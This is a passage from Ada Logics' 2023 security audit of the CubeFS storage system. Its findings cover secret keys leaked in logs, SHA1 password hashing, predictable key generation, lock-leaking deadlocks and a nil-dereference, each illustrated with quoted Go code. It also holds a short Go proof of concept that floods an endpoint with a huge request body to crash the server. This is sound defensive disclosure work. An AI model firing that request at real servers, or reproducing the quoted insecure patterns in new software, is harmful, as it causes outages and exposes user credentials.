Do(req)\n13 if err != nil{\n14 panic(err)\n15 }\n16}\n17\n18func maliciousRequest () *http.Request {\n19 s := strings. Repeat(\"malicious string\" , 100000000)\n20 r1 := strings. NewReader (s)\n21 r2 := strings. NewReader (s)\n22 r3 := strings. NewReader (s)\n23 r4 := strings. NewReader (s)\n24 r5 := strings. NewReader (s)\n25 r6 := strings. NewReader (s)\n26 r7 := strings. NewReader (s)\n27 r8 := strings. NewReader (s)\n28 r := io. MultiReader (r1, r2, r3, r4, r5, r6, r7, r8)\nCubeFS 2023 Security Audit\n14\nAda Logics Ltd29 req, err := http. NewRequest (\"POST\", \"http://localhost:8080/deleteObjects\" , r)\n30 if err != nil {\n31 panic(err)\n32 }\n33 return req\n34}\nThis request should exhaust memory temporarily and then crash the server.\nImpact\nAll CubeFS users are impacted by this issue.\nCubeFS 2023 Security Audit\n15\nAda Logics LtdCubeFS leaks magic secret key when starting Blobstore\naccess service\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-MNJHBrv3\nComponent: BlobStore\nCubeFS leaks secret configuration keys during initialization of the blobstore access service\ncontroller, more specifically here:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/blobstore/access/server.go#L76-L86\n76func initWithRegionMagic (regionMagic string) {\n77 if regionMagic == \"\" {\n78 log.Warn(\"no region magic setting, using default secret keys for \nchecksum\" )\n79 return\n80 }\n81\n82 log.Info(\"using magic secret keys for checksum with:\" , regionMagic)\n83 b := sha1. Sum([]byte(regionMagic))\n84 initTokenSecret (b[:8])\n85 initLocationSecret (b[:8])\n86}\nUsers with access to the logs can retrieve the secret key and escalate privileges to carry out\noperations on blobs that they otherwise don ʼt have the necessary permissions for. For example,\na threat actor who has successfully retrieved a magic secret key from the logs can delete blobs\nfrom the blob store by validating their requests in this step:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/blobstore/access/server.go#L546-L569\n546func (s *Service) DeleteBlob (c *rpc.Context) {\n547 args := new(access.DeleteBlobArgs)\n548 if err := c. ParseArgs (args); err != nil {\n549 c.RespondError (err)\n550 return\n551 }\n552\n553 ctx := c.Request. Context()\n554 span := trace. SpanFromContextSafe (ctx)\n555\n556 span.Debugf(\"accept /deleteblob request args:%+v\" , args)\n557 if !args.IsValid() {\n558 c.RespondError (errcode.ErrIllegalArguments)\n559 return\n560 }\n561\n562 valid := false\n563 for _, secretKey := range tokenSecretKeys {\n564 token := uptoken. DecodeToken (args.Token)\n565 if token.IsValid(args.ClusterID, args.Vid, args.BlobID, \nuint32(args.Size), secretKey[:]) {\n566 valid = true\n567 break\n568 }\n569 }\nTo exploit this security issue, the attacker needs to have privileges to read the logs. They could\nhave obtained these privileges legitimately, or they could have obtained them by already\nhaving escalated privileges.\nCubeFS 2023 Security Audit\n16\nAda Logics LtdCubeFS leaks users key in logs\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-vc34CGVVJB\nComponent: Master\nCubeFS leaks secret user keys and access keys in the logs in multiple components. When\nCubeCS creates new users, it leaks the user's secret key. 
This could allow a lower-privileged user\nwith access to the logs to retrieve sensitive information and impersonate other users with\nhigher privileges than themselves.Details\nThe vulnerable API that leaks secret keys is createKey :\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L43-L111\n43func (u *User) createKey (param *proto.UserCreateParam) (userInfo *proto.UserInfo, err \nerror) {\n44 var (\n45 AKUser *proto.AKUser\n46 userPolicy *proto.UserPolicy\n47 exist bool\n48 )\n49 if param.ID == \"\" {\n50 err = proto.ErrInvalidUserID\n51 return\n52 }\n53 if !param.Type. Valid() {\n54 err = proto.ErrInvalidUserType\n55 return\n56 }\n57\n58 var userID = param.ID\n59 var password = param.Password\n60 if password == \"\" {\n61 password = DefaultUserPassword\n62 }\n63 var accessKey = param.AccessKey\n64 if accessKey == \"\" {\n65 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n66 } else {\n67 if !proto. IsValidAK (accessKey) {\n68 err = proto.ErrInvalidAccessKey\n69 return\n70 }\n71 }\n72 var secretKey = param.SecretKey\n73 if secretKey == \"\" {\n74 secretKey = util. RandomString (secretKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n75 } else {\n76 if !proto. IsValidSK (secretKey) {\n77 err = proto.ErrInvalidSecretKey\n78 return\n79 }\n80 }\n81 var userType = param.Type\n82 var description = param.Description\n83 u.userStoreMutex. Lock()\n84 defer u.userStoreMutex. Unlock()\n85 u.AKStoreMutex. Lock()\n86 defer u.AKStoreMutex. Unlock()\n87 //check duplicate\n88 if _, exist = u.userStore. Load(userID); exist {\n89 err = proto.ErrDuplicateUserID\n90 return\n91 }\n92 _, exist = u.AKStore. Load(accessKey)\n93 for exist {\nCubeFS 2023 Security Audit\n17\nAda Logics Ltd94 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n95 _, exist = u.AKStore. Load(accessKey)\n96 }\n97 userPolicy = proto. NewUserPolicy ()\n98 userInfo = &proto.UserInfo{UserID: userID, AccessKey: accessKey, SecretKey: \nsecretKey, Policy: userPolicy,\n99 UserType: userType, CreateTime: time. Unix(time.Now().Unix(), \n0).Format(proto.TimeFormat), Description: description}\n100 AKUser = &proto.AKUser{AccessKey: accessKey, UserID: userID, Password: \nencodingPassword (password)}\n101 if err = u. syncAddUserInfo (userInfo); err != nil {\n102 return\n103 }\n104 if err = u. syncAddAKUser (AKUser); err != nil {\n105 return\n106 }\n107 u.userStore. Store(userID, userInfo)\n108 u.AKStore. Store(accessKey, AKUser)\n109 log.LogInfof (\"action[createUser], userID: %v, accesskey[%v], secretkey[%v]\" , \nuserID, accessKey, secretKey)\n110 return\n111}\ncreateKey creates a UserInfo , an access key and a secret key and stores it in the respective\nstores. If createKey successfully creates all three pieces of information and successfully stores\nthem, it will log the created pieces of information on this line:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L109\n109 log.LogInfof (\"action[createUser], userID: %v, accesskey[%v], secretkey[%v]\" , \nuserID, accessKey, secretKey)\nImpact\nAn attacker who has access to the logs can see the secret key in plain text and impersonate the\nuser. 
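A common way to keep such log lines useful without exposing the credential is to log a short, non-reversible fingerprint of the secret rather than the secret itself. The helper below is a hypothetical illustration of that pattern, not the fix that was applied in CubeFS:

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"log"
)

// fingerprint returns a short, non-reversible identifier for a secret so that
// log lines can still correlate events without revealing the value itself.
func fingerprint(secret string) string {
	sum := sha256.Sum256([]byte(secret))
	return hex.EncodeToString(sum[:4]) // 8 hex characters are enough to correlate
}

func main() {
	secretKey := "example-secret-key" // placeholder value for illustration
	// Instead of logging secretkey[%v] with the raw value:
	log.Printf("action[createUser], secretkey fingerprint[%s]", fingerprint(secretKey))
}
```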
The attacker can either be an internal user with limited privileges to read the log, or it canbe an external user who has escalated privileges su\u0000iciently to access the logs.\nTo find the places where CubeFS logs the users accessKey , we refer to the following grep call:\ngrep -r \"log\\.\" . --exclude=*test.go | grep accessKey . Not all occurrences of this constitute a\nvulnerability: Only cases of logging a\u0000 er authorization represent a security issue.\nCubeFS 2023 Security Audit\n18\nAda Logics LtdInsecure cryptographic primitive used for sensitive data\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-VGvgh234hb2\nComponent: Master\nCubefs Master uses an insecure cryptographic primitive for encoding user passwords. Cubefs\nuses SHA1 to encode the password. Researchers have identified theoretical collision attacks of\nSHA1 for the first time in 2004 but have only demonstrated it in practice in 2017 (Marc Stevens,\nElie Bursztein, Pierre Karpman, Ange Albertini, and Yarik Markov. \"The first collision for full SHA-\n1\"). NIST recommends that existing usage of SHA1 for security-sensitve information should be\nupgraded to SHA2 or SHA3 (https://www.nist.gov/news-events/news/2022/12/nist-retires-sha-\n1-cryptographic-algorithm). The issue exists in the encodingPassword helper:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/master/user.go#L547-L551\n547func encodingPassword (s string) string {\n548 t := sha1. New()\n549 io.WriteString (t, s)\n550 return hex.EncodeToString (t.Sum(nil))\n551}\nCubefs uses this helper when creating a user below on line 100:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/master/user.go#L43-L111\n43func (u *User) createKey (param *proto.UserCreateParam) (userInfo *proto.UserInfo, err \nerror) {\n44 var (\n45 AKUser *proto.AKUser\n46 userPolicy *proto.UserPolicy\n47 exist bool\n48 )\n49 if param.ID == \"\" {\n50 err = proto.ErrInvalidUserID\n51 return\n52 }\n53 if !param.Type. Valid() {\n54 err = proto.ErrInvalidUserType\n55 return\n56 }\n57\n58 var userID = param.ID\n59 var password = param.Password\n60 if password == \"\" {\n61 password = DefaultUserPassword\n62 }\n63 var accessKey = param.AccessKey\n64 if accessKey == \"\" {\n65 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n66 } else {\n67 if !proto. IsValidAK (accessKey) {\n68 err = proto.ErrInvalidAccessKey\n69 return\n70 }\n71 }\n72 var secretKey = param.SecretKey\n73 if secretKey == \"\" {\n74 secretKey = util. RandomString (secretKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n75 } else {\n76 if !proto. IsValidSK (secretKey) {\n77 err = proto.ErrInvalidSecretKey\n78 return\n79 }\n80 }\nCubeFS 2023 Security Audit\n19\nAda Logics Ltd81 var userType = param.Type\n82 var description = param.Description\n83 u.userStoreMutex. Lock()\n84 defer u.userStoreMutex. Unlock()\n85 u.AKStoreMutex. Lock()\n86 defer u.AKStoreMutex. Unlock()\n87 //check duplicate\n88 if _, exist = u.userStore. Load(userID); exist {\n89 err = proto.ErrDuplicateUserID\n90 return\n91 }\n92 _, exist = u.AKStore. Load(accessKey)\n93 for exist {\n94 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n95 _, exist = u.AKStore. Load(accessKey)\n96 }\n97 userPolicy = proto. NewUserPolicy ()\n98 userInfo = &proto.UserInfo{UserID: userID, AccessKey: accessKey, SecretKey: \nsecretKey, Policy: userPolicy,\n99 UserType: userType, CreateTime: time. 
Unix(time.Now().Unix(), \n0).Format(proto.TimeFormat), Description: description}\n100 AKUser = &proto.AKUser{AccessKey: accessKey, UserID: userID, Password: \nencodingPassword (password)}\n101 if err = u. syncAddUserInfo (userInfo); err != nil {\n102 return\n103 }\n104 if err = u. syncAddAKUser (AKUser); err != nil {\n105 return\n106 }\n107 u.userStore. Store(userID, userInfo)\n108 u.AKStore. Store(accessKey, AKUser)\n109 log.LogInfof (\"action[createUser], userID: %v, accesskey[%v], secretkey[%v]\" , \nuserID, accessKey, secretKey)\n110 return\n111}\nAn attacker who can retrieve the database records of users has a lower barrier for getting the\nactual passwords of users than if Cubefs used a secure primitive such as SHA2 or SHA3. To\nexploit this weakness, an attacker would already need to escalate privileges or gain access to\ndatabase records from misconfiguration of a Cubefs deployment. Even so, an attacker has the\npotential for further escalating privileges by exploiting this weakness depending on the user\ncredentials they can steal.Mitigation\nWe recommend using a secure primitive for user passwords. This would mitigate risk even if an\nattacker has access to the encrypted user passwords.\nCubeFS 2023 Security Audit\n20\nAda Logics LtdInsecure random string generator used for sensitive data\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-BH£Rj2432jk\nComponent: Master\nCubeFS uses an insecure random string generator to generate user-specific, sensitive keys used\nto authenticate users in a CubeFS deployment. This could allow an attacker to predict and/or\nguess the generated string and impersonate a user, thereby obtaining higher privileges.\nWhen CubeFS creates new users, it creates a piece of sensitive information for the user called\nthe “accessKey” . To create the accesKey , CubeFS uses an insecure string generator which makes\nit easy to guess and thereby impersonate the created user. The API that generates access keys is\nRandomString :\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/util/string.go#L58-L67\n58func RandomString (length int, seed RandomSeed) string {\n59 runs := seed. Runes()\n60 result := \"\"\n61 for i := 0; i < length; i++ {\n62 rand.Seed(time.Now().UnixNano ())\n63 randNumber := rand. Intn(len(runs))\n64 result += string(runs[randNumber])\n65 }\n66 return result\n67}\nRandomString uses math/rand seeded with UnixNano() to generate the string, which is\npredictable. math/rand is not suited for sensitive information, as stated in the documentation:\nhttps://pkg.go.dev/math/rand#pkg-overview.\nCubeFS uses RandomString() to generate user access keys in the following places:\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L63-L66\n63 var accessKey = param.AccessKey\n64 if accessKey == \"\" {\n65 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n66 } else {\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L92-L96\n92 _, exist = u.AKStore. Load(accessKey)\n93 for exist {\n94 accessKey = util. RandomString (accessKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n95 _, exist = u.AKStore. Load(accessKey)\n96 }\nhttps://github.com/cubefs/cubefs/blob/26da9925a3db98\u00009a1e9a12cca2c457f736b831/master/user.go#L72-L75\n72 var secretKey = param.SecretKey\n73 if secretKey == \"\" {\n74 secretKey = util. 
RandomString (secretKeyLength, \nutil.Numeric|util.LowerLetter|util.UpperLetter)\n75 } else {\nCubeFS 2023 Security Audit\n21\nAda Logics LtdImpact\nAn attacker could exploit the predictable random string generator and guess a users access key\nto impersonate the user and obtain higher privileges.\nCubeFS 2023 Security Audit\n22\nAda Logics LtdLack of security-best-practices documentation\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-vc34CGVVJB\nComponent: CubeFS\nCubeFS maintain documentation on how to easily get started with CubeFS, which is positive;\nhowever, CubeFS lacks a section or dedicated page on deploying and using CubeFS in a secure,\nproduction-ready manner.\nWe recommend setting up a dedicated page to accommodate this. See the Istio security-best-\npractices page for reference: https://istio.io/latest/docs/ops/best-practices/security/.\nWithout an o\u0000icially maintained security-best-practices page, users may deploy CubeFS in ways\nthat are known by the community to be insecure and obviously necessary for secure but also\neasy to overlook. Users should not be expected to read through the entire documentation to\ndissect the critical parts for deployment. Instead, we recommend a dedicated page for this\npurpose.\nThe work to maintain secure-best-practices documentation should be considered an ongoing\nprocess. Adding this to the documentation, maintaining it and developing it over time is good\npractice.\nCubeFS 2023 Security Audit\n23\nAda Logics LtdPossible deadlocks\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-LK432hu\nComponent: Multiple\nCubefs is susceptible to a number of deadlocks across multiple components. This is an\numbrella issue for all identified possible deadlocks. Deadlocks happen when two threads or\nprograms are waiting for each other to finish, where one of them does not finish. This has\nsecurity implications if an attacker is able to cause the deadlock. The attacker will steer the\nexecution of the program into a path where the program invokes a lock but does not unlock it.\nBelow we enumerate the places across the Cubefs source tree where this can happen.Rate limiter\nBelow, Cubefs locks the mutex on line 60 and unlocks it on line 72. Between the mutex lock and\nunlock, the method can exit in two places: line 63 and line 67.\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/util/ratelimit/keyratelimit.go#L58-L73\n58func (k *KeyRateLimit) Release(key string) {\n59\n60 k.mutex. Lock()\n61 limit, ok := k.current[key]\n62 if !ok {\n63 panic(\"key not in map. Possible reason: Release without Acquire.\" )\n64 }\n65 limit.refCount--\n66 if limit.refCount < 0 {\n67 panic(\"internal error: refs < 0\" )\n68 }\n69 if limit.refCount == 0 {\n70 delete(k.current, key)\n71 }\n72 k.mutex. Unlock()\n73}\nflowctrl\nA similar case to the Rate limiter exists in the flowctrl package:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/util/flowctrl/keycontroller.go#L55-L71\n55func (k *KeyFlowCtrl) Release(key string) {\n56\n57 k.mutex. Lock()\n58 ctrl, ok := k.current[key]\n59 if !ok {\n60 panic(\"key not in map. Possible reason: Release without Acquire.\" )\n61 }\n62 ctrl.refCount--\n63 if ctrl.refCount < 0 {\n64 panic(\"internal error: refs < 0\" )\n65 }\n66 if ctrl.refCount == 0 {\n67 ctrl.c.Close() // avoid goroutine leak\n68 delete(k.current, key)\n69 }\n70 k.mutex. Unlock()\n71}\nCubefs locks the mutex on line 57 and unlocks it on line 70. 
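For both Release methods shown here, the usual Go idiom removes this class of bug: take the lock and immediately defer the unlock, so every exit path, including the panics, releases it. The sketch below uses a simplified stand-in type (KeyRefs) rather than CubeFS's actual KeyRateLimit or KeyFlowCtrl:

```go
package main

import "sync"

type KeyRefs struct {
	mu      sync.Mutex
	current map[string]int
}

// Release decrements the refcount for key. Because Unlock is deferred, it runs
// on every return and even if one of the panics below fires, so the mutex can
// never be left held.
func (k *KeyRefs) Release(key string) {
	k.mu.Lock()
	defer k.mu.Unlock()

	refs, ok := k.current[key]
	if !ok {
		panic("key not in map. Possible reason: Release without Acquire.")
	}
	refs--
	if refs < 0 {
		panic("internal error: refs < 0")
	}
	if refs == 0 {
		delete(k.current, key)
		return
	}
	k.current[key] = refs
}

func main() {
	k := &KeyRefs{current: map[string]int{"a": 1}}
	k.Release("a")
}
```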
The method can exit on lines 60 and\n64 without unlocking.\nCubeFS 2023 Security Audit\n24\nAda Logics LtdMetanode\nMetanodes method for marshalling a value to bytes has a potential deadlock if the call to\nbinary.Write fails with an error, which will cause the method to panic without releasing the\nlock.\nBelow, MarshalValue() locks on line 703 and unlocks on line 719. On line 709, the method\npanics without releasing the lock:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/metanode/inode.go#L698-L721\n698func (i *Inode) MarshalValue () (val [] byte) {\n699 var err error\n700 buff := bytes. NewBuffer (make([] byte, 0, 128))\n701 buff.Grow(64)\n702\n703 i.RLock()\n704 i.MarshalInodeValue (buff)\n705 if i.getLayerLen () > 0 && i. getVer() == 0 {\n706 log.LogFatalf (\"action[MarshalValue] inode %v current verseq %v, hist \nlen (%v) stack(%v)\" , i.Inode, i. getVer(), i.getLayerLen (), string(debug. Stack()))\n707 }\n708 if err = binary. Write(buff, binary.BigEndian, int32(i. getLayerLen ())); err \n!= nil {\n709 panic(err)\n710 }\n711\n712 if i.multiSnap != nil {\n713 for _, ino := range i.multiSnap.multiVersions {\n714 ino.MarshalInodeValue (buff)\n715 }\n716 }\n717\n718 val = buff. Bytes()\n719 i.RUnlock()\n720 return\n721}\nAn attacker who can trigger the panic in a controlled manner has the potential to exploit this by\nlocking a lot or all resources on the machine and thereby cause denial of service.\nQosCtrlManager\nThe Cubefs QoS manager's method for assigning QoS to clients, assignClientsNewQos is\nsusceptible to a deadlock in case the manager has not enabled QoS. Below, the manager locks\non line 692 and unlocks on line 722. On line 694, the manager will return if the QoS is not\nenabled:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/master/limiter.go#L691-L735\n691func (qosManager *QosCtrlManager) assignClientsNewQos (factorType uint32) {\n692 qosManager. RLock()\n693 if !qosManager.qosEnable {\n694 return\n695 }\n696 serverLimit := qosManager.serverFactorLimitMap[factorType]\n697 var bufferAllocated uint64\n698\n699 // recalculate client Assign limit and buffer\n700 for _, cliInfoMgr := range qosManager.cliInfoMgrMap {\n701 cliInfo := cliInfoMgr.Cli.FactorMap[factorType]\n702 assignInfo := cliInfoMgr.Assign.FactorMap[factorType]\n703\n704 if cliInfo.Used+cliInfoMgr.Cli.FactorMap[factorType].Need == 0 {\n705 assignInfo.UsedLimit = 0\n706 assignInfo.UsedBuffer = 0\n707 } else {\n708 assignInfo.UsedLimit = \nuint64(float64(cliInfo.Used+cliInfo.Need) * float64(1-serverLimit.LimitRate))\n709 if serverLimit.Allocated != 0 {\n710 assignInfo.UsedBuffer = \nuint64(float64(serverLimit.Buffer) * (float64(assignInfo.UsedLimit) / \nfloat64(serverLimit.Allocated)) * 0.5)\n711 }\n712\nCubeFS 2023 Security Audit\n25\nAda Logics Ltd713 // buffer left may be quit large and we should not use up \nand doesn't mean if buffer large than used limit line\n714 if assignInfo.UsedBuffer > assignInfo.UsedLimit {\n715 assignInfo.UsedBuffer = assignInfo.UsedLimit\n716 }\n717 }\n718\n719 bufferAllocated += assignInfo.UsedBuffer\n720 }\n721\n722 qosManager. RUnlock()\n723\n724 if serverLimit.Buffer > bufferAllocated {\n725 serverLimit.Buffer -= bufferAllocated\n726 } else {\n727 serverLimit.Buffer = 0\n728 log.LogWarnf (\"action[assignClientsNewQos] vol [%v] type [%v] clients \nbuffer [%v] and server buffer used up trigger flow limit overall\" ,\n729 qosManager.vol.Name, proto. 
QosTypeString (factorType), \nbufferAllocated)\n730 }\n731\n732 log.QosWriteDebugf (\"action[assignClientsNewQos] vol [%v] type [%v] \nserverLimit buffer:[%v] used:[%v] need:[%v] total:[%v]\" ,\n733 qosManager.vol.Name, proto. QosTypeString (factorType),\n734 serverLimit.Buffer, serverLimit.Allocated, \nserverLimit.NeedAfterAlloc, serverLimit.Total)\n735}\nAn attacker cannot control whether Cubefs should proceed into this branch and return:\n1 if !qosManager.qosEnable {\n2 return\n3 }\nFor an attacker to return on line 694 and thereby prevent Cubefs from unlocking the manager,\nthey would need to know that the victims Cubefs deployment has disabled QoS and thereby\ncause Cubefs to invoke assignClientsNewQos .\nBlock cache\nThe Block cache manager has a method for removing item keys from the cache to free up\nspace, freeSpace . This method invokes a loop that ends when a counter, cnt reaches 500000 .\nEach loop iteration performs the following steps: 1) The Block cache manager locks, 2) an item\nis deleted from the store, 3) the Block cache manager unlocks. This process is susceptible to a\ndeadlock because the freeSpace method can exist between step 1 and 3, i.e. it is possible for\nfreeSpace to lock the Block cache manager and return without unlocking it.\nOn line 390 the manager enters the for loop. Inside the loop, the manager locks on line 399 and\nunlocks on line 415. On line 403, freeSpace can return without unlocking the manager.\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/blockcache/bcache/manage.go#L379-\nL419\n379func (bm *bcacheManager) freeSpace (store *DiskStore, free float32, files int64) {\n380 var decreaseSpace int64\n381 var decreaseCnt int\n382\n383 if free < store.freeLimit {\n384 decreaseSpace = int64((store.freeLimit - free) * \n(float32(store.capacity)))\n385 }\n386 if files > int64(store.limit) {\n387 decreaseCnt = int(files - int64(store.limit))\n388 }\n389\n390 cnt := 0\n391 for {\n392 if decreaseCnt <= 0 && decreaseSpace <= 0 {\n393 break\n394 }\n395 //avoid dead loop\n396 if cnt > 500000 {\n397 break\n398 }\nCubeFS 2023 Security Audit\n26\nAda Logics Ltd399 bm.Lock()\n400\n401 element := bm.lrulist. Front()\n402 if element == nil {\n403 return\n404 }\n405 item := element.Value.(*cacheItem)\n406\n407 if err := store. remove(item.key); err == nil {\n408 bm.lrulist. Remove(element)\n409 delete(bm.bcacheKeys, item.key)\n410 decreaseSpace -= int64(item.size)\n411 decreaseCnt--\n412 cnt++\n413 }\n414\n415 bm.Unlock()\n416 log.LogDebugf (\"remove %v from cache\" , item.key)\n417\n418 }\n419}\nVolume manager\nWhen Cubefs's Volume Manager applies an update to a volume unit, it does so with\napplyAdminUpdateVolumeUnit . applyAdminUpdateVolumeUnit gets the disk info with a call to the disk\nmanagers GetDiskInfo . If this call fails, applyAdminUpdateVolumeUnit returns the error. Before\ngetting the disk info, applyAdminUpdateVolumeUnit puts a lock on the volume that is being\nmodified, and applyAdminUpdateVolumeUnit will not release that lock if the call to GetDiskInfo\nfails. In other words, if the call to GetDiskInfo fails, the lock will not be released. The parameter\nto GetDiskInfo is passed directly from a parameter to applyAdminUpdateVolumeUnit .\napplyAdminUpdateVolumeUnit locks the volume on line 691 and unlocks it again on line 710. 
On\nline 701, applyAdminUpdateVolumeUnit returns without unlocking the volume.\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/blobstore/clustermgr/volumemgr/vol\numemgr.go#L675-L711\n675func (v *VolumeMgr) applyAdminUpdateVolumeUnit (ctx context.Context, unitInfo \n*cm.AdminUpdateUnitArgs) error {\n676 span := trace. SpanFromContextSafe (ctx)\n677 vol := v.all. getVol(unitInfo.Vuid. Vid())\n678 if vol == nil {\n679 span.Errorf(\"apply admin update volume unit,vid %d not exist\" , \nunitInfo.Vuid. Vid())\n680 return ErrVolumeNotExist\n681 }\n682 index := unitInfo.Vuid. Index()\n683 vol.lock. RLock()\n684 if int(index) >= len(vol.vUnits) {\n685 span.Errorf(\"apply admin update volume unit,index:%d over vuids \nlength \" , index)\n686 vol.lock. RUnlock()\n687 return ErrVolumeUnitNotExist\n688 }\n689 vol.lock. RUnlock()\n690\n691 vol.lock. Lock()\n692 if proto.IsValidEpoch (unitInfo.Epoch) {\n693 vol.vUnits[index].epoch = unitInfo.Epoch\n694 vol.vUnits[index].vuInfo.Vuid = \nproto.EncodeVuid (vol.vUnits[index].vuidPrefix, unitInfo.Epoch)\n695 }\n696 if proto.IsValidEpoch (unitInfo.NextEpoch) {\n697 vol.vUnits[index].nextEpoch = unitInfo.NextEpoch\n698 }\n699 diskInfo, err := v.diskMgr. GetDiskInfo (ctx, unitInfo.DiskID)\n700 if err != nil {\n701 return err\n702 }\n703 vol.vUnits[index].vuInfo.DiskID = diskInfo.DiskID\n704 vol.vUnits[index].vuInfo.Host = diskInfo.Host\n705 vol.vUnits[index].vuInfo.Compacting = unitInfo.Compacting\n706\n707 unitRecord := vol.vUnits[index]. ToVolumeUnitRecord ()\n708 err = v.volumeTbl. PutVolumeUnit (unitInfo.Vuid. VuidPrefix(), unitRecord)\n709 vol.lock. Unlock()\n710 return err\nCubeFS 2023 Security Audit\n27\nAda Logics Ltd711}\nThis deadlock can be triggered in two ways. One way is to pass a parameter to\napplyAdminUpdateVolumeUnit , which the user knows will result in returning on line 701. The\nsecond way is to modify the disk manager such that when another user invokes GetDiskInfo()\non line 699, it will fail. GetDiskInfo returns an error if the diskInfo of the passed DiskID does\nnot exist:\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/clustermgr/diskmgr/diskm\ngr.go#L274-L285\n274func (d *DiskMgr) GetDiskInfo (ctx context.Context, id proto.DiskID) \n(*blobnode.DiskInfo, error) {\n275 diskInfo, ok := d. getDisk(id)\n276 if !ok {\n277 return nil, apierrors.ErrCMDiskNotFound\n278 }\n279\n280 diskInfo.lock. RLock()\n281 defer diskInfo.lock. RUnlock()\n282 newDiskInfo := *(diskInfo.info)\n283 // need to copy before return, or the higher level may change the disk info \nby the disk info pointer\n284 return &(newDiskInfo), nil\n285}\nAn attacker could trigger the deadlock by removing disks that the caller of\napplyAdminUpdateVolumeUnit expects to exist.\nBlobnode\nThe PutShard method of the ShardsBuf type is susceptible to a deadlock from a missing lock\nrelease in case of a wrong size comparison.\nPutShard performs a size comparison as part of a sanity check and returns an error if the data\nsize does not match the expected size. When doing so, PutShard does not unlock the ShardsBuf .\nOn line 293 below, PutShard locks the ShardsBuf and unlocks it on line 312. On line 309,\nPutShard performs the sanity check if int64(len(shards.shards[bid].data)) != size { and\nreturns errShardSizeNotMatch on line 310 if it fails. 
Before returning errShardSizeNotMatch ,\nPutShard does not unlock the ShardsBuf , and it remains locked a\u0000 er returning:\nhttps://github.com/cubefs/cubefs/blob/46cb4d149c45f1ad7b40381b5a2a20bd6d599e25/blobstore/blobnode/work_shard_rec\nover.go#L292-L324\n292func (shards *ShardsBuf) PutShard (bid proto.BlobID, input io.Reader) error {\n293 shards.mu. Lock()\n294\n295 if _, ok := shards.shards[bid]; !ok {\n296 shards.mu. Unlock()\n297 return errBidNotFoundInBuf\n298 }\n299 if shards.shards[bid].size == 0 {\n300 shards.mu. Unlock()\n301 return nil\n302 }\n303 if shards.shards[bid].ok {\n304 shards.mu. Unlock()\n305 return errBufHasData\n306 }\n307\n308 size := shards.shards[bid].size\n309 if int64(len(shards.shards[bid].data)) != size {\n310 return errShardSizeNotMatch\n311 }\n312 shards.mu. Unlock()\n313\n314 // read data from remote is slow,so optimize use of lock\n315 _, err := io. ReadFull (input, shards.shards[bid].data)\n316 if err != nil {\n317 return err\n318 }\nCubeFS 2023 Security Audit\n28\nAda Logics Ltd319\n320 shards.mu. Lock()\n321 shards.shards[bid].ok = true\n322 shards.mu. Unlock()\n323 return nil\n324}\nCubeFS 2023 Security Audit\n29\nAda Logics LtdPossible nil-dereference from unmarshalling double\npointer\nSeverity: Low\nStatus: Fixed\nId: ADA-CUBEFS-ASBDVGA\nComponent: ObjectNode\nUnmarshalling into a double-pointer can result in nil-pointer dereference if the raw bytes are\nNULL .\nCubeFS has a case that would trigger a nil-pointer dereference and crash the CubeFS\nObjectNode:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/objectnode/acl_api.go#L186-L201\n186func getObjectACL (vol *Volume, path string, needDefault bool) (*AccessControlPolicy, \nerror) {\n187 xAttr, err := vol. GetXAttr (path, XAttrKeyOSSACL)\n188 if err != nil || xAttr == nil {\n189 return nil, err\n190 }\n191 var acp *AccessControlPolicy\n192 data := xAttr. Get(XAttrKeyOSSACL)\n193 if len(data) > 0 {\n194 if err = json. Unmarshal (data, &acp); err != nil {\n195 err = xml. Unmarshal (data, &acp)\n196 }\n197 } else if needDefault {\n198 acp = CreateDefaultACL (vol.owner)\n199 }\n200 return acp, err\n201}\nOn line 194, getObjectACL unmarshals into a double pointer. acp is declared on line 191 as a\npointer and is referenced with a pointer on line 194. If data on line 194 is the byte sequence\nequal to NULL , acp will be nil on line 194 and return nil, nil .\nThis behaviour will trigger 